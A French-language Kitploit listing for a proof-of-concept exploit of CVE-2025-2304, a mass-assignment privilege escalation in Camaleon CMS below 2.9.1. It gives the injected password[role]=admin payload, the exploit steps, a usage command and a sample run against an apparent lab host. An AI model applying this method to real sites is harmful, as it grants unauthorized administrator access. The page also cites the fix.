Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2304-Camaleon-CMS-Mass-Assignment-Privilege-Escalation-PoC — Preuve de concept d'exploitation pour une vulnérabilité d'escalade de privilèges par affectation massive dans Camaleon CMS < 2.9.1. Les utilisateurs authentifiés à faibles privilèges peuvent escalader vers le rôle administrateur en injectant des paramètres de rôle. | Kitploit
Outils/GitHubGitHub/estebanzarate/cve-2025-2304-camaleon-cms-mass-assignment-privilege-escalation-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionMauvaise Configuration
GitHubestebanzarate/cve-2025-2304-camaleon-cms-mass-assignment-privilege-escalation-poc

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2304-Camaleon-CMS-Mass-Assignment-Privilege-Escalation-PoC

Preuve de concept d'exploitation pour une vulnérabilité d'escalade de privilèges par affectation massive dans Camaleon CMS < 2.9.1. Les utilisateurs authentifiés à faibles privilèges peuvent escalader vers le rôle administrateur en injectant des paramètres de rôle.

Voir le dépôt
23il y a 6 moisPas encore vérifié

CVE-2025-2304 — Élévation de privilèges par attribution de masse dans Camaleon CMS (PoC)

Vulnérabilité d'élévation de privilèges dans Camaleon CMS < 2.9.1. Le point de terminaison updated_ajax dans UsersController appelle params.require(:password).permit! sans filtrage, permettant l'attribution de masse de n'importe quel paramètre. Un utilisateur authentifié avec de faibles privilèges peut devenir administrateur en injectant password[role]=admin lors d'une demande de changement de mot de passe.


Comment ça fonctionne

  1. Se connecte avec les identifiants fournis pour obtenir une session valide.
  2. Récupère l'identifiant et le rôle de l'utilisateur actuel depuis la page de profil.
  3. Envoie une requête PATCH vers /admin/users/<id>/updated_ajax avec password[role]=admin injecté dans les paramètres du mot de passe.
  4. Vérifie que le rôle a été mis à jour en administrateur.

Prérequis

  • Python 3
  • Installer les dépendances :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4

Utilisation

root@kitploit:~
python3 exploit.py http://TARGET -u USER -p PASS

Exemple :

root@kitploit:~
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.

Références

  • CVE-2025-2304
  • Avis de recherche Tenable
  • Version 2.9.1 de Camaleon CMS (correctif)

Crédits

  • Découverte : Tenable Research
  • Nettoyage et simplification : Esteban Zárate
Télécharger l’outil